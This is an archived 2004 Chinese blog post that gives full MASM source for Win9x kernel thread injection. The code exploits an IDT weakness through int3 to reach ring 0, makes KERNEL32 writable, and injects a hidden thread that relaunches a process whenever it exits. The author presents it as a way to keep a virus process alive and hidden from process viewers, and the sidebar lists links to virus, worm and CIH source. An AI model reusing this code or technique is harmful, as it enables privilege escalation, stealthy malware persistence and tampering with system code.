U148 Archive

Markdown archive served by Next.js

WIN9X内核线程注入及进程不死技 :: 凌辰三点

来源: BlogBus 原始链接: http://www.blogbus.com:80/blogbus/blog/diary.php?diaryid=65728 存档链接: https://web.archive.org/web/20041201100436id_/http://www.blogbus.com:80/blogbus/blog/diary.php?diaryid=65728

凌辰三点 记录一些自己资料 <<<SEH in ASM 研究 | 首页 | 动态的查找Kernel32.dll的模块句柄与 GetProcAddress的API函数地址  >>> WIN9X内核线程注入及进程不死技 时间: 2004-01-03 我们知道在NT内核下可以通过CreateRemoteThread插入到其他进程地址空间,这样可以让我们的线程脱离 本身的进程而存在,但在WIN9X下则不行,但在WHG的中国黑客中却加入了WIN9X内核线程注入技术,可以将 自己的线程注入到KERNEL32。DLL中,但在他的代码中是通过WinExec来实现从启病毒进程,而在WIN32下 最好是通过CreateProcessA来实现,可该函数在执行时,必须往相应的内存中写入StartInfo ,ProcessInfo 等信息,而KERNEL32在RING3却是只读的,所以我改进了一下,将其改为可读写,这样RING3进程可以任意修改 API,HOOK也可以很简单了,在注入的过程中用到了未公开API,CreateKernelThread,由于MSDN上没有说明 所以只能自己猜,在这里我将自己的线程注入到KERNEL32的地址BFF70600H中(这段都是空的其代码从BFF71000H) 开始,我调试时发现,调用该API后系统便转移到我注入的内核线程中开始执行,到WaitForSingleObject,返回 原进程继续执行至结束,然后再返回到注入内核线程的WaitForSingleObject后继续执行,这样我们就 可以让自己 的线程脱离进程而进入KERNEL32空间运行,在系统的进程查看器中也找不到我插入的线程,通过上面的方法我把上次 WIN9X进程监控代码移至内核中,不过我发现系统变的很缓慢,不象以前在进程自己的空间执行那样,真是奇怪啊 那位高手帮忙看看啊??.386p .model flat,stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc include \masm32\include\user32.inc includelib \masm32\lib\kernel32.lib includelib \masm32\lib\user32.lib MoveDataToKnl PROTO :dword,:dword,:dword .data User db 'User32.dll',0 KnlOpenProcessStrdb 'OpenProcess',0 KnlWaitForObjectStrdb 'WaitForSingleObject',0 KnlSleepStrdb 'Sleep',0 KnlCreateKnlThreadStrdb 'CreateKernelThread',0 KnlGetStartupInfoStr db 'GetStartupInfoA',0 KnlCreateProcessStr db 'CreateProcessA',0 KnlGetExitCodeProcessStr db 'GetExitCodeProcess',0 UserMessageBoxStr db 'MessageBoxA',0 .code ;问题,要Sleep()这样做使Kernel32有机会更新数据 KnlThread procProcID:dword callGetKnlSleep KnlSleep dd ? GetKnlSleep: pop eax push 0h call dword ptr[eax] callGetKnlOpenProcess KnlOpenProcess dd ? GetKnlOpenProcess: popeax push ProcID push FALSE push PROCESS_ALL_ACCESS calldword ptr[eax] oreax,eax jz ExitProtectProc movebx,eax callGetKnlWaitForSingleObject KnlWaitForSingleObject dd ? GetKnlWaitForSingleObject: popeax push -1h push ebx calldword ptr[eax] Run: call Next Next: pop esi sub esi,offset Next lea ebx,StartInfo[esi] call GetStartupIn KnlGetStartupInfo dd ? GetStartupIn: pop eax push ebx calldword ptr[eax] call GetCreateProcess KnlCreateProcess dd ? GetCreateProcess: pop eax lea ebx,ProcessInfo[esi] push ebx lea ebx,StartInfo[esi] push ebx push 0 push 0 push NORMAL_PRIORITY_CLASS push 0 push 0 push 0 push 0 callGetFileNameAddress FileName db 'c:\windows\notepad.exe',0 GetFileNameAddress: calldword ptr[eax] or eax,eax jz ExitProtectProc mov ebx,eax @@CheckStatus: call GetGetExitCodeProcess KnlGetExitCodeProcess dd ? GetGetExitCodeProcess: pop eax push ebx push esp push ProcessInfo.hProcess[esi] calldword ptr[eax] or eax,eax jz ExitProtectProc pop eax cmp eax,STILL_ACTIVE jz @@CheckStatus call GetMessageBox UserMessageBox dd ? GetMessageBox: pop eax call MsgOK db 'NotePad Exit ??',0 MsgOK: pop ebx push MB_YESNO push ebx push ebx push 0 calldword ptr[eax] cmp eax,IDNO jz Run ExitProtectProc: ret KnlThread endp StartInfo STARTUPINFO<> ProcessInfo PROCESS_INformATION<> KnlThreadLength = $-KnlThread Start: invokeGetProcAddress,0bff70000h,offset KnlOpenProcessStr movKnlOpenProcess,eax invokeGetProcAddress,0bff70000h,offset KnlWaitForObjectStr movKnlWaitForSingleObject,eax invokeGetProcAddress,0bff70000h,offset KnlGetStartupInfoStr movKnlGetStartupInfo,eax invokeGetProcAddress,0bff70000h,offset KnlCreateProcessStr movKnlCreateProcess,eax invokeGetProcAddress,0bff70000h,offset KnlGetExitCodeProcessStr movKnlGetExitCodeProcess,eax invokeGetProcAddress,0bff70000h,offset KnlSleepStr movKnlSleep,eax invoke GetModuleHandle,offset User or eax,eax jnz OK invoke LoadLibraryA,offset User OK: invokeGetProcAddress,eax,offset UserMessageBoxStr movUserMessageBox,eax invokeMoveDataToKnl,offset KnlThread ,0bff70600h,KnlThreadLength ;ret ;int3; invokeGetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr movebx,eax callGetCurrentProcessId pusheax push esp push 0 push eax push 0bff70000h+600h push 0 push 0 callebx popeax invokeMessageBoxA,0,offset FileName,offset FileName,0 Exit: invoke ExitProcess,0 ;ret MoveDataToKnl proc Src:dword,Des:dword,nCx:dword push ebx push esi push edi pusheax sidt[esp-2] popeax addeax,3*8 movebx,[eax] movedx,[eax+4] callSetIdt03 pushad ;Ring0 mov eax,cr3 ;设置KERNEL32为可读写 and eax,0fffff000h push eax call P2L mov edx,0bff70000h shr edx,22 shl edx,2 mov eax,[eax+edx] cmp eax,1 jz GExit and eax,0fffff000h push eax call P2L push eax mov edx,0bff70000h shl edx,10 shr edx,22 shl edx,2 mov eax,[eax+edx] cmp eax,1 jz GExit pop ecx or eax,7h mov [ecx+edx],eax GExit: popad cli pushad mov[eax],ebx mov[eax+4],edx cld repmovsb ;复制代码/数据到内核代码指定位置 popad sti push ebp mov ebp,esp ;抵消系统自动生成的LEAVE指令 iretd SetIdt03: popword ptr[eax] popword ptr[eax+6] movesi,Src movedi,Des movecx,nCx int3 ;利用Win9x,IDT漏洞进入系统内核 pop edi pop esi pop ebx ret MoveDataToKnl endp P2L proc P2LAddress:DWORD ;物理地址->线性性地址 push P2LAddress int 20h dd 0001006ch ;VmmCall_MapPhysToLinear add esp,4 ret P2L endp end Start seath 发表于 2004-01-03 03:30 引用(Trackback0) | 编辑 评论 发表评论 最后更新 我写的病毒疫苗程序 我编写的病毒Trojan.Dicta.5632 动态的查找Kernel32.dll的模块句柄与 GetProcAddress的API函数地址 WIN9X内核线程注入及进程不死技 SEH in ASM 研究 p2p蠕虫的代码 Elkern.C源代码 CIH1.2完全源程序 MBR加载过程 中断发生时候